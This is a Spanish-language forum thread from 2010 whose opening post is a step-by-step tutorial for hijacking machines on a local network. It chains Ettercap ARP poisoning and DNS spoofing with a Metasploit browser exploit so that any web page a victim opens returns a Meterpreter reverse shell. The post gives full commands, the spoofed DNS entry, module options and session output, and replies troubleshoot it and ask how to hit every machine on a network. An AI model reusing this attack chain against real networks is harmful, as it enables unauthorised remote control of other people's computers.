[Ettercap + Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]

Shell Root · 10-Jan-2010, 00:53

[Ettercap + Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
[Metasploit By: Shell Root]

Miremos que tal hacen un Duo Ettercap y Metasploit (Un Duo Letal... xD). Miremos como hacer una suplantación de nombre de dominio, para la ejecución inconciente de una URL infectada con un exploit del Metasploit, devolviendo una session del Meterpreter.

Primero instalemos el Ettercap: Esta herramienta esta dentro de los repositorios
Código:
shell@ShellRoot:~$ sudo apt-get install ettercap

Ahora entremos entraremos a la siguiente ruta /usr/share/ettercap/, donde se encuentra el archivo etter.dns. (En este archivo, incluiremos unas lineas). Lo abrimos así:
Código:
shell@ShellRoot:~$ sudo gedit /usr/share/ettercap/etter.dns
[sudo] password for shell: *******

Buscamos la siguiente linea:
Código:
################################
# microsoft sucks

# redirect it to The Linux Home Page at Linux Online
#

Y le agregamos:
Código:
* A 192.168.0.3:8080
Nota: El * para que cuando entre a cualquier URL se redireccione a la URL Infectada. Podemos poner el Host que deseemos si no quieren poner el *. : P

Ahora entramos el Metasploit y seleccionamos el exploit windows/browser/ani_loadimage_chunksize o windows/browser/ms09_002_memory_corruption

Código:
shell@ShellRoot:~/msf3$ ./msfconsole

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) >

Modificamos el parametro URIPATH para que no nos saque un Ramdom sino un Slash
Código:
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /

Ahora seleccionamos el PAYLOAD, en este caso windows/meterpreter/reverse_tcp
Código:
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Ingresamos el parametro LHOST
Código:
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.0.3
LHOST => 192.168.0.3

Miramos que todo esque bien y ejecutamos el exploit
Código:
msf exploit(ani_loadimage_chunksize) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.3 yes The local address
LPORT 4444 yes The local port

Exploit target:

Id Name
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

msf exploit(ani_loadimage_chunksize) > exploit[*] Started reverse handler on port 4444[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.0.3:8080/[*] Server started.

Ahora entramos a la shell e iniciamos el sniffer del ettercap
Código:
shell@ShellRoot:~$ sudo ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.0.5/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> 00:0C:29:AE:81:42 192.168.0.5 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

etter.dns:41 Invalid ip address
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |================================================= =>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

Nota: Dejamos esta ventana quieta y esperemos a que la Victima inicie cualquier pagina web.

Waiting... Despues de esperar unos 3 Min... : P, miramos que hemos conseguido una session del Meterpreter... :O
Código:
msf exploit(ani_loadimage_chunksize) > [*] Attempting to exploit ani_loadimage_chunksize[*] Sending HTML page to 192.168.0.5:1130...[*] Attempting to exploit ani_loadimage_chunksize[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.0.5:1130...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.5:1131)

Ahora solo bastara con mirar las Sesiones con el comando sessions -l y para selecciona una sesion con el comando sessions -i Numero_Session. Asi:
Código:
msf exploit(ani_loadimage_chunksize) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

Adaptador Ethernet PCI AMD PCNET Family - Minipuerto del administrador de paquetes
Hardware MAC: 00:0c:29:8f:90:c4
IP Address : 192.168.0.5
Netmask : 255.255.255.0

meterpreter >

Con esto damos por concluido el tutorial y ver el poder que tienen estas dos herramientas, si se usan conjuntamente. Esto es lo basico, esperen el resto... ;·)

By: Shell Root
Fuente: [Ettercap + Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
Video: Nothing...

darkhunter · 10-Jan-2010, 12:25

buen aporte

cls_1231 · 30-Jan-2010, 22:15

mi pregunta a este post son :

1 - la maquina tiene q ser vulnerable a este exploit ?
2 - si tiene todos los parches el windows se podra ??
O.o"

Shell Root · 02-Feb-2010, 20:49

Como vez, estamos usando un exploit que se ejecuta al ingresar en una URL en especifica, así que no hace falta que este parcheada hablando de Windows!.

Existe muchos exploits que son así, por ejemplo el IE_Aurora! un 0day de Internet Explorer, que junto con Ettercap, sería un arma letal!

j4c0b0 · 03-Feb-2010, 04:43

Esto si, esta bien

Gracias por el tutorial

samuraiblanco · 03-Feb-2010, 09:03

Muy clarito y efectivo. Muy bien ShellRoot¡¡¡¡¡¡¡¡

cls_1231 · 03-Mar-2010, 14:55

buenas tardes =), mi pregunta a esta forma de conseguir meterpreter es, funciona con todas las versiones de mozilla ? por que he intentado con la ultima version y no consigo nada aparte q si tiene alguna forma de solucionar ese problema =) gracias

DreaDy.HK · 03-Mar-2010, 18:41

esta es la ip de la maquina que estamos atacando "192.168.0.5" ???

eso no me queda claro, es posible realizar un ataque multiple con ettercap, es decir a cualquier computadora que este en la red, lo digo porqeu siempre que vivo tutoriales lo hacen contra una maquina en especifica, siempre vi lo del ataque poisoning arp y siempre es con una maquina, con ettercap se pueden hacer ataques multiples (es decir a todas las maquinas de la red) ???

de antemano se agradece ...

Salu2

PD: no me queda del todo claro, cualquier pagina http: que habra la maquina y genera la sesión ???

la otra duda es cuando estoy en metasploit y le doy a "exploit" me dale esto

msf exploit(ani_loadimage_chunksize) > exploit[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.101:4444 [*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.1.101:8080/[*] Server started.
msf exploit(ani_loadimage_chunksize) > (vuelve a la linea para que ejecute un comando, esta bien asi ???)

y lo otro en la pagina donde esta ettercap trabajando me salio una linea al final pero nada mas

Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: [go.microsoft.com] spoofed to [198.182.196.XXX]

la última linea representa algo ?

DreaDy.HK · 03-Mar-2010, 19:31

dos cosas bro, cuand lanzo el exploit en vez de quedar a la escucha me dice starting, pero se sale y me lanza la linea para ejecutar otro comando ... no se si esto esta bien

pasa esto :

msf exploit(ani_loadimage_chunksize) > exploit[*] Started reverse handler on port 4444[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.0.3:8080/[*] Server started.
(e inmediatamente abajo sale la linea para lanzar un comando)

msf exploit(ani_loadimage_chunksize) >

Lo otro que no me queda claro, esta es la ip de la victima "192.168.0.5" ???

y lo otro, de ser efectivo el punto anterior, ettercap solo realiza ataques individualizados ??? es posible atacar a todas las maquinas de la red ???

De antemano se agredece la info, salu2

PD: al editar esas lineas donde dice microsoft sucks en mi archivo sale esto

# microsoft sucks

# redirect it to The Linux Home Page at Linux Online
#
microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allo***

hice como tu dijiste de solo agregar la linea pero creo que de ser asi te dara error, ademas de agregar segun yo hay que eliminar un par de lineas quedando asi:

# microsoft sucks

# redirect it to The Linux Home Page at Linux Online
#
* A 192.168.0.3:8080

o me equivoco ??

de antemano se agradece la info

Salu2